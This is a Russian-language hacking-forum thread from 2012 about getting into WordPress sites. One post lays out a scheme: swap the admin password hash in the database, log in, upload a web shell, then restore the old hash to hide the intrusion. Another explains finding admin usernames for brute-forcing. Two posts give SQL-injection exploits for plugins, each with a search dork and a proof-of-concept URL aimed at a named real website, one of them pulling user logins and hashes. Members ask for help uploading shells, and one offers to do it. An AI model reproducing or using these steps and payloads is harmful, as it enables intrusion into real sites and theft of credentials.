HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Веб-уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 07.08.2012, 12:33
BigBear
Новичок
Регистрация: 04.12.2008
Сообщений: 11
С нами: 9176038

Репутация: 8
По умолчанию

Цитата:
Сообщение от WendM  
Как можно зайти под админом\залить шел, если
1)Есть доступ к бд = есть логи и пасс(мд5) админа
2)Версия движка 2.5.1
3)Секрет кей не дефолтный
Спасибо заранее


Моя бы схема выглядела так:

1) Есть доступ в бд, но нет расшифрованного пасса? Нет проблем!

Заходим в БД. Пишем запрос

Код:
select password from users where id=1
Запоминаем/записываем хэшик.

Далее запрашиваем

Код:
update users set password='NewPassword' where id=1
NewPassword можно взять из любых расшифрованных ВордПресс хэшей. Например в этом сообщении

2) Проверяем, что у нашего юзверя сменился хэшик в БД.

3) site/wp-login.php - логин мы знаем, пасс расшифрованный тоже. Спасибо ВП что ещё соль не надо апдейтить (хотя это +1 запрос к бд, не новички смогут и 1 запросом апдейт сделать)

4) Так как мы внутри - льём шелл, например так

5) Из-под шелла или ещё где цепляемся в бд и делаем запрос

Код:
update users set password='OldPassword' where id=1
Где OldPassword = старый, сохранённый хэшик.


З.Ы. Прикольно жёлтый цвет на мрачном фоне смотрится =)
 
Ответить с цитированием

  #2  
Старый 07.08.2012, 21:18
WendM
Познающий
Регистрация: 29.01.2012
Сообщений: 44
С нами: 7519286

Репутация: 3
По умолчанию

Цитата:
Сообщение от BigBear  


Далее запрашиваем

Код:
update users set password='NewPassword' where id=1

не лезит)
 
Ответить с цитированием

  #3  
Старый 09.08.2012, 16:55
2nikola
Новичок
Регистрация: 16.07.2012
Сообщений: 2
С нами: 7275926

Репутация: 0
По умолчанию

WendM напиши в личку логин и хеш залью шелл
 
Ответить с цитированием

  #4  
Старый 13.08.2012, 15:50
VY_CMa
Постоянный
Регистрация: 06.01.2012
Сообщений: 913
С нами: 7552406

Репутация: 724


По умолчанию

Помошник брута

Дело в том что, чем дальше я влажу в ядро движка, тем больше радуюсь тому, что билдеры как-будто специально оставляют нам шансы на проникновение. Сегодня обратил внимание на wp-login.php

Дело в том, что WP позволяет отображать ник, как того пожелает сам автор, отнюдь, не всегда админ использует логин "admin". Довольно часто приходится брутить... Но как же брутить, если мы не знаем логин админа? В этом нам помогает движок. Дело в том, что скрипт сам помогает нам найти логин админа с помощью того же брута. Возьмем случайны блог и гугла.

PHP код:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//domashenko.ru/wp-login.php[/COLOR][/COLOR] 
Введем в качестве логина "superuser", а в качестве пасса "123". На что получим подсказку, что юзера с ником "superuser" в базе нет....



Введем логин "admin" и пароль к примеру "test", в результате получаем:



Конечно не новшество, но мне частенько пригождается.
 
Ответить с цитированием

  #5  
Старый 14.08.2012, 22:04
Asin
Новичок
Регистрация: 28.10.2010
Сообщений: 5
С нами: 8178806

Репутация: 0
По умолчанию

Цитата:
Сообщение от VY_CMa  
Сегодня обратил внимание на wp-login.php
пригождается.
Один из первых шагов по безопасности Wordpress смена страницы входа в админку - wp-login.php
 
Ответить с цитированием

  #6  
Старый 16.08.2012, 12:28
Planet85
Новичок
Регистрация: 15.08.2012
Сообщений: 1
С нами: 7232726

Репутация: 0
По умолчанию

Подскажите пожалуйста, как использовать полученные при помощи программы WP_Cracker логин и хэш? чтобы редактировать сайт
 
Ответить с цитированием

  #7  
Старый 16.08.2012, 20:51
BigBear
Новичок
Регистрация: 04.12.2008
Сообщений: 11
С нами: 9176038

Репутация: 8
По умолчанию

Цитата:
Сообщение от Planet85  
Подскажите пожалуйста, как использовать полученные при помощи программы WP_Cracker логин и хэш? чтобы редактировать сайт
Как создатель софтины - советую прочитать отдельную тему по ней тут
 
Ответить с цитированием

  #8  
Старый 05.09.2012, 00:44
tvano0
Новичок
Регистрация: 11.10.2010
Сообщений: 0
С нами: 8203286

Репутация: 0
По умолчанию

вопрос, есть админка, темы и плагины нельзя с неё редактировать.

какие еще методы есть чтоб залить шел? вп 3.4.1
 
Ответить с цитированием

  #9  
Старый 02.10.2012, 03:20
z0mbyak
Познающий
Регистрация: 10.04.2010
Сообщений: 49
С нами: 8467184

Репутация: 1
По умолчанию

fs real estate plugin SQL-Inj

# Exploit Title: fs real estate plugin SQL-Inj

# Date: Oct 2, 2012

#Exploit Author: z0mbyak

# Vendor Homepage: find by yourself

# Software Link: find by yourself

# Version: don't know

# Tested in: web

# Dork: inurl:"marker_listings.xml?id"

# Exploit: -2+union+select+version(),2,3,4,5,6,7,8,9,10,11,12, 13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29 ,30,31--

# PoC:

http://themacnabs.com/wp-content/plugins/fs-real-estate-plugin/xml/marker_listings.xml?id=-2+union+select+version(),2,3,4,5,6,7,8,9,10,11,12, 13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29 ,30,31--

P.S. Кол-во колонок может отличаться...

P.P.S. Мб, боян, по wp не работаю)
 
Ответить с цитированием

  #10  
Старый 19.10.2012, 20:31
ukrpunk
Познающий
Регистрация: 31.10.2011
Сообщений: 35
С нами: 7648886

Репутация: 5
По умолчанию

# Exploit Title: ripe-hd-player SQL-Inj

# Date: 19.10.2012

# Exploit Author:ukrpunk

# Vendor Homepage: find by yourself

# Software Link: find by yourself

# Version: don't know

# Tested in: web

# Dork:inurl:"/plugins/ripe-hd-player"

# Exploit:-1+union+select+1,2,3,4,5,concat(user_login,0x3a,us er_pass),7,8,9,10,11,12,13,14,15,16,17+from+wp_use rs--

# PoC: http://www.fitness-bucuresti.ro/wp-content/plugins/ripe-hd-player/config.php?id=-1+union+select+1,2,3,4,5,concat(user_login,0x3a,us er_pass),7,8,9,10,11,12,13,14,15,16,17+from+wp_use rs--
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обзор уязвимостей CMS [Joomla,Mambo] и их компонентов it's my Веб-уязвимости 361 24.10.2019 10:25
[ Обзор уязвимостей PHP-Nuke ] [53x]Shadow Веб-уязвимости 43 04.02.2012 20:33
[ Обзор уязвимостей SLAED CMS ] _kREveDKo_ Веб-уязвимости 20 01.11.2009 14:28
ОБЗОР УЯЗВИМОСТЕЙ БЕСПЛАТНЫХ ПОЧТОВЫХ СЕРВИСОВ nike57 Уязвимости Mail-сервис 4 05.05.2006 22:03
Статья обзор уязвимостей бесплатных почтовых сервисов markel Уязвимости Mail-сервис 3 12.09.2005 10:07



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.